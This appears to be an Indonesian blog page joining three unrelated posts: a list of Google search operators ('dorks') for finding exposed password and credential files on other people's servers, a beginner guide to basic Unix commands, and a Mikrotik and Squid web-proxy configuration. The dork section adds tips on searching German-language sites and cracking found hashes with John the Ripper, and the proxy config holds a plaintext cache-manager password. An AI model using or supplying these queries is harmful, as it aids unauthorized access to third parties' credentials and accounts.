———————————————————
filetype:config config intext: |Microsoft .NET application credentials
appSettings “User ID”
———————————————————
filetype:pwd service |Microsoft FrontPage Service Web passwords
———————————————————
intitle:index.of |Microsoft FrontPage Web credentials
administrators.pwd
———————————————————
“# -FrontPage-” |Microsoft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords
(Service | authors | administrators)
———————————————————
inurl:perform filetype:ini |mIRC nickserv credentials
———————————————————
intitle:”index of” intext: |mySQL database credentials
connect.inc
———————————————————
intitle:”index of” intext: |mySQL database credentials
globals.inc
———————————————————
filetype:conf oekakibbs |Oekakibss user passwords
———————————————————
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
———————————————————
inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
———————————————————
index.of passlist |Passlist user credentials
———————————————————
inurl:passlist.txt |passlist.txt file user credentials
———————————————————
filetype:dat “password.dat” |password.dat files
———————————————————
inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
———————————————————
filetype:log inurl:”password.log” |password.log files cleartext
|passwords
———————————————————
inurl:people.lst filetype:lst |People.lst generic password file
———————————————————
intitle:index.of config.php |PHP Configuration File database
|credentials
———————————————————
inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
———————————————————
inurl:nuke filetype:sql |PHP-Nuke credentials
———————————————————
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
“USER.PASS=”
———————————————————
filetype:ini ServUDaemon |servU FTP Daemon credentials
———————————————————
filetype:conf slapd.conf |slapd configuration files root password
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
———————————————————
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords
———————————————————
filetype:sql password |SQL passwords
———————————————————
filetype:ini wcx_ftp |Total Commander FTP passwords
———————————————————
filetype:netrc password |UNIX .netrc user credentials
———————————————————
index.of.etc |UNIX /etc directories contain
|various credential files
———————————————————
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials
———————————————————
intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
———————————————————
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials
———————————————————
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
———————————————————
intitle:index.of master.passwd |UNIX master.passwd user credentials
———————————————————
intitle:”Index of” spwd.db |UNIX spwd.db credentials
passwd -pam.conf
———————————————————
filetype:bak inurl:”htaccess| |UNIX various password file backups
passwd|shadow|htusers
———————————————————
filetype:inc dbconn |Various database credentials
———————————————————
filetype:inc intext:mysql_ |Various database credentials, server names
connect
———————————————————
filetype:properties inurl:db |Various database credentials, server names
intext:password
———————————————————
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
———————————————————
inurl:”wvdial.conf” intext: |wdial dialup user credentials
”password”
———————————————————
filetype:mdb wwforum |Web Wiz Forums Web credentials
———————————————————
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords
———————————————————
filetype:pwl pwl |Windows Password List user credentials
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”defaultusername” intext: |credentials
”defaultpassword”
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”internet account manager” |credentials
———————————————————
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials
“parent directory”
———————————————————
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
———————————————————
inurl:/wwwboard |wwwboard user credentials
———————————————————

mungkin temen2 ada yang ingin melihat password dari website jerman?
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.

—————————————————–
BAHASA |KATA-KATA| TRANSLATE
—————————————————–
German |password | Kennwort
Spanish |password | contraseña
French |password | mot de passe
Italian |password | parola d’accesso
Portuguese |password | senha
Dutch |password | Paswoord
—————————————————–

setelah temen2 banyak mendapatkan password, apa yang akan anda lakukan?jangan berbuat jahat yang pasti, lihat2 saja isinya atau anda terlalu baik dengan memberitahu admin. jangan lupa sediakan john the ripper dirumah, sapa tau password yang disimpan sudah dalam keadaan terenkripsi.

keterangan :
karena ketidak teraturan kata2 pada artikel ini, setelah tanda “|” berarti itu merupakan keterangan dari kata kunci. MOHON MAAF

Mengenal Perintah Dasar Pada Sistem Operasi Unix

Stuktur Dasar Perintah Pada Unix
Perintah-perintah yang terdapat pada sistem operasi unix umumnya adalah berupa command line. yangCase-Sensitive, artinya perintah ini membedakan dua perintah dengan huruf besar dan huruf kecil. Hal ini juga berlaku untuk file dan direktori.
Misalnya :
isi file1 berbeda dengan isi File1

Sedangkan perintah buil-in pada Unix umumnya menggunakan huruf kecil

Struktur dasar perintah command line tersebut pada unix adalah sebagai berikut :
perintah [pilihan] [argumen]

Penjelasan :
- perintah, adalah command yang digunakan untuk melakukan suatu action.
- Kurung siku menyatakan bahwa yang ada di dalamnya bersifat optional. Bisa ada,bisa tidak.
- Pilihan (option) untuk mengubah atau menambah default tindakan dari perintah.
- Argument menyatakan objek yang akan diproses oleh perintah. Bagian ini umumnya berupa file; tetapi bisa juga berisi data yang akan diproses.

Sebagai contoh, suatu perintah mempunyai format sebagai berikut :
kh [-wc] file…
Artinya, bentuk suatu perintah berikut diperkenankan :
$kh -w file1
$kh -w -c file1 file 2
$kh file2
$kh file1

Pilihan (Option)
Sebuah pilihan adalah bagian dari baris perintah, berupa sebuah kata yang diawali dengan tanda minus (-), yang mengontrol tindakan dari suatu perintah.
Sebagai contoh, ls adalah utilitas yang digunakan untuk menampilkan isi dari suatu direktori. Perintah ls bisa tidak mengandung pilihan maupun argumen. Hasilnya berupa nama-nama file pada direktori kerja (sama seperti dir pada Dos). Untuk mengubah tindakan default dari ls, pilihan seperti -l (menampilkan informasi file, seperti ukuran file) dapat ditambahkan.
$ls
file1
file2
file3

$ls -l
total 3
-rwx-rw-r– 1 user_name group 3k Des 15 14:20 file1
-rw—r—r– 1 user_name group 4k Des 16 14:21 file2
-rw—rw-rw 1 user_name group 5k Des 16 14:30 file3

Adakalanya pilihan yang perlu diberikan tidak hanya sebuah. Sebagai contoh, pada ls terdapat pilihan -r yang akan menampilkan daftar file dengan urutan nama secara terbalik (descending), misal :
$ls -r
file3
file2
file1

Apabila diinginkan untuk mengandung option -r dan -l, dapat dilakukan dengan memberi perintah sebagai berikut :
$ls -r -l

Selain menggunakan cara di depan, pilihan -l dan -r dapat digabungkan menjadi sebuah kata. Dengan penulisan :
$ls -lr , yang hasilnya ekivalen dengan $ls -l -r atau
$ls -rl , yang hasilnya ekivalen dengan $ls -r -l

Argument
Argument atau yang dikenal juga dengan parameter adalah bagian dari baris perintah yang digunakan untuk menyebutkan informasi - data, file dan sebagainya - yang akan dikenai tindakan oleh perintah. Berbeda dengan pilihan, argumen tidak mempunyai tanda khusus yang digunakan untuk mengawalinya.
Contoh :

$ls -rl /usr/bin

maka file yang diproses adalah seluruh file yang ada di /usr/bin .

Berikut ini adalah daftar ringkasan beberapa perintah dasar yang sering digunakan pada unix :

Perintah untuk Manajemen File
PERINTAH KETERANGAN
cat Menampilkan isi file (seperti type pada Dos)

cp Menyalin satu atau beberapa file (seperti copy pada Dos)

find Mencari file tertentu pada suatu direktori (seperti Dir pada Dos)

ls Menampilkan informasi file
more Menampilkan file per screen

mv Memindahkan suatu file ke direktori lain
pg Menampilkan isi suatu file teks per layar

rm Menghapus file (sama seperti Del pada Dos)

Perintah Manajemen Direktori
PERINTAH KETERANGAN
cd Mengaktifkan suatu direktori sebagai direktori
copy Menyalin seluruh struktur direktori ataupun file

mkdir Membuat direktori baru

pwd
Menampilkan nama direktori tempat kita bekerja
Rmdir Menghapus direktori

Perintah untuk mengatur Akses Direktori
PERINTAH KETERANGAN
chgrp Mengubah group dari suatu direktori
chmod Mengubah permisi dari suatu file atau direktori
chown Mengubah pemilik dari suatu file atau direktori

Perintah Lingkungan Sistem
PERINTAH KETERANGAN
exit Keluar dari shell pada Bourne shell dan Korn shell
id Menampilkan nama pemakai beserta identitas dari pemakai
logname Menampilkan nama pemakai
logout Keluar dari shell pada C shell
man Menampilkan dokumentasi online dri suatu perintah Unix (sama seperti Help)
newgrp Mengubah group efektif
passwd Mengganti password
set Menampilkan variabel lingkungan pada shell pemakai
tty Menampilkan nama identitas (port) terminal
uname Menampilkan nama sistem operasi
whoami Menampilan nama pemakai yang sedang menggunakan sistem

Perintah Yang Berhubungan dengan Layar
PERINTAH KETERANGAN
banner Menampilkan tulisan berukuran besar
clear Menghapus layar (sama seperti Cls pada DOS)
echo Menampilkan tulisan ke layar

Perintah yang berhubungan dengan Proses
PERINTAH KETERANGAN
kill Menghentikan suatu proses berdasarkan identitas proses
ps Menampilkan proses yang sedang berjalan
sleep Menunda eksekusi (proses yang tidak mengerjakan apa-apa selama beberapa detik)

Perintah-perintah lain
PERINTAH KETERANGAN
bc Utilitas untuk melakukan perhitungan
cal Menampilkan Kalender
date Menampilkan tanggal dan jam sistem
grep Mencri file-file yang mengandung kata tertentu
lp Mencetak file ke printer
mail Utilitas untuk menyampaikan pesan tertulis ke pemakai lain
sort Mengurutkan data
vi Editor teks
wc Menghitung jumlah karakter, kata, dan baris pada suatu file

Beberapa reference yang dapat digunakan untuk mengenal sistem operasi Unix lebih jauh lagi dapat dilihat di :
[1]. http://Ldp.linux.or.id/howto
[2]. http://www.faq.org
[3]. http://linux-howto.com/ldp/howto

Setting Web-Proxy dengan Mikrotik
web proxy dengan menggunakan SquidNT

konfigurasi jaringan

internet
|
|
mikrotik = Internet= 192.10.11.1
| Lan = 192.168.0.1
|
|
switch/hub—-Client = 192.168.0.2-192.168.0.11
|
|
Web proxy SquidNT= 192.168.0.12 (multi fungsi dengan billing server)

dan ini settingan Mikrotik

[admin@XXXXX] > ip firewall nat pr
Flags: X - disabled, I - invalid, D - dynamic
0 ;;; Sharing Internet
chain=srcnat out-interface=WAN_eth1 src-address=192.168.0.0/24
action=masquerade
1 ;;; Web Proxy
chain=dstnat in-interface=LOKAL LAN_eth3 protocol=tcp dst-port=80
src-address-list=Ip_List_Web_ProXy action=redirect to-ports=8080
#=============================
[admin@XXXXX] > ip web-proxy pr
enabled: yes
src-address: 0.0.0.0
port: 8080
hostname: “BagusNet”
transparent-proxy: yes
parent-proxy: 192.168.0.1:3128
cache-administrator: “Situs_Porno_Ngak_Dapat_Di_Akses_Selama_Bulan_Puasa_
By_sherayusuf@localhost”

max-object-size: 10000KiB
cache-drive: system
max-cache-size: unlimited
max-ram-cache-size: unlimited
status: running
reserved-for-cache: 5269504KiB
reserved-for-ram-cache: 25600KiB
#=============================
[admin@XXXXX] > ip proxy pr
enabled: yes
port: 3128
parent-proxy: 0.0.0.0:1
maximal-client-connecions: 1000
maximal-server-connectons: 1000

dan ini settingan Squid.conf saya

http_port 8080
http_port 3128
#http_port 80
icp_port 3130

#====================================================
# TAG: hierarchy_stoplist
# A list of words which, if found in a URL, cause the object to
# be handled directly by this cache. In other words, use this
# to not query neighbor caches for certain objects. You may
# list this option multiple times.
#We recommend you to use at least the following line.
#=====================================================
hierarchy_stoplist cgi-bin ? .js .jsp .g .do .php .asp .cgi localhost visicom indosat.net.id
acl QUERY urlpath_regex cgi-bin \? .js .jsp .g .do .php .asp .cgi localhost visicom indosat.net.id
no_cache deny QUERY
#============================================================$
# OPTION UKURAN CACHE
#============================================================$
cache_mem 64 MB
maximum_object_size 16 MB
maximum_object_size_in_memory 128 KB
minimum_object_size 2 KB
fqdncache_size 1024
cache_swap_low 98%
cache_swap_high 99%
cache_replacement_policy heap GDSF
memory_replacement_policy heap GDSF
high_memory_warning 70 MB
ipcache_size 4096
ipcache_low 98
ipcache_high 99
#============================================================$
# DIREKTORI LOG DAN CACHE
#============================================================$
cache_access_log c:/squid/var/logs/access.log
cache_log c:/squid/var/logs/cache.log
cache_store_log c:/squid/var/logs/store.log
mime_table c:/squid/etc/mime.conf
pid_filename c:/squid/var/logs/squid.pid
log_fqdn off
log_icp_queries off
buffered_logs off
emulate_httpd_log off
#============================================================$
# TIMEOUT
#============================================================$
half_closed_clients off
#============================================================$
# FTP section
#============================================================$
ftp_passive on
ftp_sanitycheck on
#============================================================$
# DNS resolution section
#============================================================$
dns_nameservers 127.0.0.1/8 202.72.208.8/29 202.149.69.254/24
#============================================================$
# AUTH section
#============================================================$
#auth_param basic children 5
#auth_param basic realm Squid proxy-caching web server
#auth_param basic credentialsttl 2 hours
#auth_param basic casesensitive off
#============================================================$
# Refresh Rate TUNING CACHE PROXY
#============================================================$
refresh_pattern \.gif 4320 50% 43200
refresh_pattern \.jpg 4320 50% 43200
refresh_pattern \.tif 4320 50% 43200
refresh_pattern \.png 4320 50% 43200
refresh_pattern \.jpeg 4320 50% 43200
refresh_pattern ^http://www.friendster.com/.* 720 100% 4320
refresh_pattern ^http://mail.yahoo.com/.* 720 100% 4320
refresh_pattern ^http://*.yahoo.*/.* 720 100% 4320
refresh_pattern ^http://*.yimg.*/.* 720 100% 4320
refresh_pattern ^http://*.gmail.*/.* 720 100% 4320
refresh_pattern ^http://*.google.*/.* 720 100% 4320
refresh_pattern ^http://*korea.*/.* 720 100% 4320
refresh_pattern ^http://*.akamai.*/.* 720 100% 4320
refresh_pattern ^http://*.windowsmedia.*/.* 720 100% 4320
refresh_pattern ^http://*.googlesyndication.*/.* 720 100% 4320
refresh_pattern ^http://*.plasa.*/.* 720 100% 4320
refresh_pattern ^http://*.telkom.*/.* 720 100% 4320
refresh_pattern ^ftp: 10080 95% 40320 reload-into-ims override-lastmod
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320 reload-into-ims override-lastmod
negative_ttl 1 minutes

quick_abort_min 0 KB
quick_abort_max 0 KB
quick_abort_pct 100%

#============================================================$
# ACL section AKSES KONTROL
#============================================================$
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl mikrotik src 192.168.0.1
acl localnet src 192.168.0.0/24 192.10.11.0/24 202.72.208.8/29
acl localhost src 127.0.0.1/255.255.255.255
#acl our_networks src 192.168.0.0/24 192.10.11.0/24 202.72.208.8/29
acl to_localhost dst 127.0.0.0/8
acl SSL_ports port 443 563 # https, snews
acl SSL_ports port 873 # rsync
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 563 # https, snews
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 5004 # telnet Mikrotik bima dan bagus net
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl Safe_ports port 631 # cups
acl Safe_ports port 873 # rsync
acl Safe_ports port 901 # SWAT
acl purge method PURGE
acl CONNECT method CONNECT
acl blokdomain dstdomain -i regex “C:\squid\etc\blocklist.txt”
#acl blokdomain dstdomain “C:\squid\etc\blocklist.txt”
acl blocker dstdomain -i regex “c:\squid\etc\blocklist.txt”

#acl ipblok dst “C:\squid\etc\blocklist.txt”
acl porno url_regex -i “C:\squid\etc\blocklist.txt”
no_cache deny porno
acl noporno url_regex -i “C:\squid\etc\nonporno.txt”
http_access deny porno all
#http_access deny ipblok
http_access deny blokdomain
#http_access deny files
http_access allow manager localhost
http_access deny manager
http_access allow noporno all
http_access allow localnet
http_access allow localhost
#http_access deny blocker
http_access allow mikrotik

http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny CONNECT
#http_access deny all

maximum_object_size 10240 KB
maximum_object_size_in_memory 32 KB
minimum_object_size 4 KB
ipcache_size 4096
ipcache_low 98
ipcache_high 99
quick_abort_min 0
quick_abort_max 0
quick_abort_pct 100
fqdncache_size 4096
shutdown_lifetime 10 second
cachemgr_passwd flashdisk
cache_effective_user squid
cache_effective_group squid
memory_pools off
buffered_logs off
log_icp_queries off
logfile_rotate 0
log_fqdn off
forwarded_for on
icp_hit_stale on
query_icmp on
reload_into_ims on
emulate_httpd_log off
negative_ttl 2 minutes
pipeline_prefetch on
vary_ignore_expire on
half_closed_clients off
high_memory_warning 32 MB
high_response_time_warning 2000
high_page_fault_warning 2
cache_mgr Selama_Bulan_Puasas_Situs_Porno_tidak_dapat_Di_Akses_By_yusuf_sexerchivest@yahoo.com
visible_hostname bagusnet_proxy_web_filter_by_yusuf
header_access Accept-Encoding deny all
#============================================================$
# Transparent proxy setting
#============================================================$
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
httpd_accel_no_pmtu_disc on
httpd_accel_single_host off
half_closed_clients off
#forwarded_for on

#============================================================$
# MISCELLANEOUS
#============================================================$
logfile_rotate 3
negative_ttl 2 minutes
#digest_rebuild_period 30 minute
#digest_rewrite_period 30 minute
#digest_swapout_chunk_size 4096 bytes
client_persistent_connections on
server_persistent_connections on
pipeline_prefetch on
vary_ignore_expire on
reload_into_ims on
store_dir_select_algorithm round-robin
nonhierarchical_direct off
prefer_direct off
memory_pools off
shutdown_lifetime 5 seconds
cachemgr_passwd flashdisk
ie_refresh on
cache_effective_user proxy
cache_effective_group proxy

Setting Queue Simple

auto”>[admin@XXXXXXqueue simple> pr
Flags: X - disabled, I - invalid, D - dynamic
0 X name=”Operator-iix” target-addresses=192.168.0.12/32
dst-address=0.0.0.0/0 interface=all parent=none packet-marks=paket-iix
direction=both priority=8 queue=default-small/default-small
limit-at=0/0 max-limit=0/0 total-queue=default-small

1 X name=”Operator-intl” target-addresses=192.168.0.12/32
dst-address=0.0.0.0/0 interface=all parent=none packet-marks=paket-intl
direction=both priority=8 queue=default-small/default-small
limit-at=0/0 max-limit=0/0 total-queue=default-small

2 name=”bagus1-iix” target-addresses=192.168.0.2/32 dst-address=0.0.0.0/0
interface=all parent=none packet-marks=paket-iix direction=both
priority=8 queue=default-small/default-small limit-at=0/0
max-limit=256000/384000 total-queue=default-small

Setting IP firewall

[admin@xxxxxx] ip firewall mangle> pr
Flags: X - disabled, I - invalid, D - dynamic
0 ;;; Pisahin INT sama IIX
chain=prerouting in-interface=LOKAL LAN_eth3 dst-address-list=nice
action=mark-connection new-connection-mark=con-iix passthrough=yes

1 chain=prerouting connection-mark=con-iix action=mark-packet
new-packet-mark=paket-iix passthrough=no

2 chain=prerouting action=mark-packet new-packet-mark=paket-intl
passthrough=no

3 X ;;; ICMP
chain=forward protocol=icmp action=mark-connection
new-connection-mark=icmp_conn passthrough=yes

4 X chain=prerouting connection-mark=icmp_conn action=mark-packet
new-packet-mark=icmp passthrough=yes

5 X chain=prerouting packet-mark=icmp action=mark-packet
new-packet-mark=icmp_other passthrough=yes